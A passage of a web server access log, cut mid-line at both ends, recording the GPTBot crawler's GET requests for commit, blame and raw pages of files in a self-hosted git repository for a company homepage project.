+0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/tsconfig.json" [Client 74.7.227.38] [Length 9860] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/tsconfig.json" -[17/Feb/2026:13:07:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/js/script.js" [Client 74.7.227.38] [Length 10535] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/js/script.js" -[17/Feb/2026:13:07:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/js/script.js" [Client 74.7.227.38] [Length 10329] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/js/script.js" -[17/Feb/2026:13:07:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/App.tsx" [Client 74.7.227.38] [Length 12752] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" -[17/Feb/2026:13:07:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/database.sqlite" [Client 74.7.227.38] [Length 10866] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data" -[17/Feb/2026:13:07:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.gitignore" [Client 74.7.227.38] [Length 10969] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03" -[17/Feb/2026:13:07:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx.conf" [Client 74.7.227.38] [Length 11964] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03" -[17/Feb/2026:13:07:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 7733877] [Gzip 11.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/dcsintegration.png" -[17/Feb/2026:13:07:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/README.md" [Client 74.7.227.38] [Length 11306] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html" -[17/Feb/2026:13:07:33 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html" -[17/Feb/2026:13:07:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/About.tsx" [Client 74.7.227.38] [Length 13931] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components" -[17/Feb/2026:13:07:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15549] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components" -[17/Feb/2026:13:07:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03" [Client 74.7.227.38] [Length 11374] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03" -[17/Feb/2026:13:07:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13141] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/services" -[17/Feb/2026:13:07:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/App.tsx" [Client 74.7.227.38] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/App.tsx" -[17/Feb/2026:13:07:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/database.sqlite" [Client 74.7.227.38] [Length 81793] [Gzip 50.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/database.sqlite" -[17/Feb/2026:13:07:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.gitignore" [Client 74.7.227.38] [Length 9908] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.gitignore" -[17/Feb/2026:13:07:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx.conf" [Client 74.7.227.38] [Length 10142] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx.conf" -[17/Feb/2026:13:07:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/App.tsx" [Client 74.7.227.38] [Length 12446] [Gzip 5.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/App.tsx" -[17/Feb/2026:13:07:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/README.md" [Client 74.7.227.38] [Length 9862] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/README.md" -[17/Feb/2026:13:07:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/README.md" [Client 74.7.227.38] [Length 10952] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/README.md" -[17/Feb/2026:13:07:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/App.tsx" -[17/Feb/2026:13:07:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/database.sqlite" [Client 74.7.227.38] [Length 159744] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/database.sqlite" -[17/Feb/2026:13:07:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.gitignore" [Client 74.7.227.38] [Length 9986] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.gitignore" -[17/Feb/2026:13:07:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12936] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/services/geminiService.ts" -[17/Feb/2026:13:07:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx.conf" [Client 74.7.227.38] [Length 11849] [Gzip 4.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx.conf" -[17/Feb/2026:13:07:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.gitignore" [Client 74.7.227.38] [Length 28] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.gitignore" -[17/Feb/2026:13:07:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx.conf" [Client 74.7.227.38] [Length 796] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx.conf" -[17/Feb/2026:13:07:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/README.md" -[17/Feb/2026:13:07:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/services/geminiService.ts" -[17/Feb/2026:13:07:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 26322] [Gzip 6.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js" -[17/Feb/2026:13:07:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 20952] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" -[17/Feb/2026:13:07:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/nginx.conf" [Client 74.7.227.38] [Length 11260] [Gzip 4.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/nginx.conf" -[17/Feb/2026:13:07:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/package.json" [Client 74.7.227.38] [Length 11674] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" -[17/Feb/2026:13:07:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal" [Client 74.7.227.38] [Length 10738] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm" -[17/Feb/2026:13:07:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/package.json" [Client 74.7.227.38] [Length 11668] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html" -[17/Feb/2026:13:07:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/package.json" [Client 74.7.227.38] [Length 11668] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html" -[17/Feb/2026:13:07:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/script.js" [Client 74.7.227.38] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html" -[17/Feb/2026:13:07:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/script.js" [Client 74.7.227.38] [Length 14904] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js" -[17/Feb/2026:13:07:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/package.json" [Client 74.7.227.38] [Length 11670] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html" -[17/Feb/2026:13:07:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/App.tsx" [Client 74.7.227.38] [Length 12448] [Gzip 5.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/App.tsx" -[17/Feb/2026:13:07:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 10522] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/i18n.js" -[17/Feb/2026:13:07:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/App.tsx" -[17/Feb/2026:13:07:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/find/commit/90c7377285c0e63de46467557a2f081b33097f03" [Client 74.7.227.38] [Length 7506] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03" -[17/Feb/2026:13:07:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/package.json" [Client 74.7.227.38] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/package.json" -[17/Feb/2026:13:07:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal" [Client 74.7.227.38] [Length 9927] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal" -[17/Feb/2026:13:07:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/package.json" [Client 74.7.227.38] [Length 9864] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/package.json" -[17/Feb/2026:13:07:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/package.json" [Client 74.7.227.38] [Length 9864] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/package.json" -[17/Feb/2026:13:07:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/package.json" [Client 74.7.227.38] [Length 10952] [Gzip 4.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/package.json" -[17/Feb/2026:13:07:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/package.json" [Client 74.7.227.38] [Length 10952] [Gzip 4.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/package.json" -[17/Feb/2026:13:07:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt" [Client 74.7.227.38] [Length 9869] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal" -[17/Feb/2026:13:07:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/script.js" [Client 74.7.227.38] [Length 10753] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/script.js" -[17/Feb/2026:13:07:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/package.json" [Client 74.7.227.38] [Length 10955] [Gzip 4.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/package.json" -[17/Feb/2026:13:07:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/package.json" [Client 74.7.227.38] [Length 9857] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/package.json" -[17/Feb/2026:13:07:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/script.js" [Client 74.7.227.38] [Length 16517] [Gzip 7.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/script.js" -[17/Feb/2026:13:07:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/package.json" -[17/Feb/2026:13:07:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/package.json" -[17/Feb/2026:13:07:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr 